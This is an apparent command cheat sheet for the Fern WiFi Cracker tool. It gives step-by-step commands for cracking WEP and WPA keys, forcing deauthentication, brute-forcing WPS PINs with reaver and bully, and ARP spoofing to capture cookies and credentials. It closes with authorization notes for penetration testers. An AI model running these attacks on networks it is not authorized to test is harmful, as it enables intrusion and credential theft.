```bash
# Install from the package repository
sudo apt-get update
sudo apt-get install fern-wifi-cracker

# Or install from source
git clone https://github.com/savio-code/fern-wifi-cracker
cd fern-wifi-cracker
sudo python setup.py install

# Install dependencies
sudo apt-get install aircrack-ng reaver bully python-gtk2 python-paramiko

# Verify the installation
fern-wifi-cracker --version

# Run as root (required for packet capture)
sudo fern-wifi-cracker
fern-wifi-cracker --help
```
| Step | Action | Description |
|---|---|---|
| 1 | Select interface | Choose wireless adapter (wlan0, wlan1, etc.) |
| 2 | Monitor mode | Enable monitor mode on selected interface |
| 3 | Channel selection | Leave as auto or specify channel range |
| 4 | Confirm | Click Start to begin scanning |
```bash
sudo airmon-ng start wlan0
# Creates mon0 interface
sudo airmon-ng stop mon0
sudo service network-manager restart
```
- Click Scan in main window
- Networks appear in list with signal strength
- Refresh rate updates every few seconds
- BSSID, SSID, encryption type, and channel displayed
| Column | Meaning |
|---|---|
| SSID | Network name |
| BSSID | MAC address of access point |
| Channel | WiFi channel (1-14) |
| Security | WEP, WPA, WPA2, Open |
| Signal | Strength in dBm |
| Clients | Connected devices |
```bash
# Scan specific channel only
# Configure in Fern UI: Preferences > Advanced
```
- Select WEP network from scan list
- Click WEP in attack menu
- Choose attack method:
  - Standard - Aircrack-ng default
  - Chopchop - Fast method, 60% success
  - Fragmentation - Works with low traffic

```bash
# Automatic in Fern, or manual:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture mon0
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 mon0
```

- Minimum 40,000 IV packets required
- Wait for sufficient IVs collected
- Fern automatically cracks when ready
- Key displayed in hex format (e.g., 1a2b3c4d5e)
```bash
# Use rockyou.txt or generate custom list
gunzip /usr/share/wordlists/rockyou.txt.gz
# Or create custom list
echo "password123" > wordlist.txt
echo "admin" >> wordlist.txt
```
- Select WPA/WPA2 network
- Click WPA in attack menu
- Verify BSSID and SSID match
- Select wordlist:
  - Load rockyou.txt
  - Or point to custom list
- Click Start Attack
```bash
# Capture 4-way handshake (automatic in Fern)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake mon0
# Force deauth to speed up handshake
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF mon0
sudo aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
```
| Feature | Details |
|---|---|
| Speed | 2-10 hours typical |
| Success Rate | 90%+ with default PIN |
| Target | WPS-enabled routers |
| Output | 8-digit PIN, then WiFi password |
- Select WPS-enabled network
- Click WPS > Reaver
- Review target BSSID
- Click Start
- Wait for PIN discovery
```bash
sudo reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv
sudo reaver -i mon0 -b AA:BB:CC:DD:EE:FF \
  --timeout=10 \
  --max-attempts=0 \
  --delay=0 \
  -vv
sudo bully -i mon0 -b AA:BB:CC:DD:EE:FF -v 1
```
| Option | Purpose |
|---|---|
| `-i` | Interface (monitor mode) |
| `-b` | BSSID of target |
| `-v` | Verbosity level |
| `--timeout` | Seconds to wait per attempt |
| `--max-attempts` | Maximum PIN tries (0=unlimited) |
- Select target client in Fern
- Click Session Hijacking
- Choose attack type:
  - ARP Spoofing
  - TCP/UDP injection
  - HTTPS stripping
```bash
sudo arpspoof -i wlan0 -t TARGET_IP GATEWAY_IP
# Simultaneously run tcpdump to capture traffic
sudo tcpdump -i wlan0 -w capture.pcap
```
- Select connected client
- Specify target gateway
- Enable packet sniffing
- Monitor captured credentials
- Enable session hijacking
- Filter for HTTP/HTTPS traffic
- Monitor for session cookies
- Extract cookie values
```bash
# Use Wireshark to inspect captured packets
wireshark capture.pcap
# Filter: http.cookie
```
- Automatic in Session Hijacking mode
- Displays captured cookies
- Shows HTTP authentication data
- Identifies unencrypted sessions
- Tools > GeoIP Database
- Download MaxMind GeoLite2 database
- Point Fern to database location
- Scan results show location markers
- Right-click BSSID > GeoIP
- Displays country, city, coordinates
- Useful for site surveys
```bash
# Database location
~/.fern/geoip/GeoLite2-City.mmdb
# Download latest (URL quoted so the shell does not treat "?" as a glob)
wget "https://geoip.maxmind.com/geoip/databases/GeoLite2-City/download?suffix=tar.gz"
```
```
/usr/share/wordlists/rockyou.txt                 # 14M passwords
/usr/share/wordlists/fasttrack.txt               # Common passwords
/usr/share/wordlists/darkweb2017-top10000.txt
```
- Click Tools > Wordlist Manager
- Add custom lists
- View list statistics
- Enable/disable lists for attacks
```bash
# Create from common patterns
crunch 8 8 0123456789 > numeric8.txt
# Merge multiple lists
cat list1.txt list2.txt > combined.txt
# Remove duplicates
sort -u wordlist.txt > wordlist-clean.txt
# Count entries
wc -l wordlist.txt
# Combine base words with rule mutations (--stdout prints candidates instead of treating the list as a hash file)
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt
```
- Tools > Database of Cracked Networks
- Search by SSID or BSSID
- View password and timestamp
- Export results
```
~/.fern/database/networks.db
```
- Select networks from database
- Click Export
- Choose format (CSV, TXT)
- Save to file
```bash
cp ~/.fern/database/networks.db networks.db.bak
```
- Click Tools > Database
- Select Import
- Choose backup file
- Merge with current database
- Interface - Select wireless adapter
- Channel Range - 1-11 (US), 1-13 (EU), 1-14 (Japan)
- Scan Rate - Refresh interval in seconds
- Timeout - Handshake capture wait time
- WPA Timeout - Seconds per password attempt
- Reaver Timeout - Delay between PIN guesses
- Max Attempts - Cap on cracking attempts
- Verbosity - Debug output level
- Theme - Light/Dark mode
- Font Size - Adjust readability
- Refresh Rate - Update frequency
- Window Size - Save position/size
```bash
# 1. Enable monitor mode
sudo airmon-ng start wlan0
# 2. Launch Fern
sudo fern-wifi-cracker
# 3. Scan networks
# 4. Select WPA target
# 5. Load /usr/share/wordlists/rockyou.txt
# 6. Click Start Attack
# 7. Wait for password discovery
```

```bash
# 1. Identify WPS network in scan
# 2. Right-click > WPS > Reaver
# 3. Monitor progress in output window
# 4. PIN typically found in 2-10 hours
# 5. Password automatically extracted
```

```bash
# 1. Scan and select target network
# 2. View Clients tab
# 3. See connected device MAC addresses
# 4. Right-click client > Info
# 5. View signal strength and device details
```

```bash
# 1. Enable Session Hijacking
# 2. Select target client
# 3. Specify gateway IP
# 4. Click Start
# 5. Monitor HTTP requests in output
# 6. Extract username/password from traffic
```
```bash
# Check interface
sudo iwconfig
# Force restart
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Verify with airmon-ng
sudo airmon-ng
```
- Verify wireless adapter supports monitor mode
- Check USB adapter power supply
- Ensure interface is mon0 or mon1
- Try manual scan: `sudo airodump-ng mon0`
- Increase capture time (wait 2-3 minutes)
- Get closer to target AP
- Force deauth to nearby client
- Verify encryption is actually WPA/WPA2
- Use smaller wordlist (fasttrack.txt)
- Verify handshake is valid (use Wireshark)
- Try GPU acceleration with hashcat
- Increase timeout setting
- Verify WPS is enabled on router
- Check router isn’t rate-limiting
- Try Bully instead of Reaver
- Update Reaver/Bully to latest version
| Practice | Benefit |
|---|---|
| Obtain written authorization | Legal compliance |
| Test on lab networks first | Avoid mistakes on targets |
| Use strong wordlists | Better success rate |
| Monitor signal strength | Improve handshake capture |
| Keep tools updated | Latest exploits and fixes |
| Document findings | Professional reporting |
- Only use on networks you own or have permission to test
- WPA2 with strong passwords resists dictionary attacks
- Modern routers implement WPS rate limiting
- EAP/Enterprise WPA2 requires different tools
- Always obtain written authorization before testing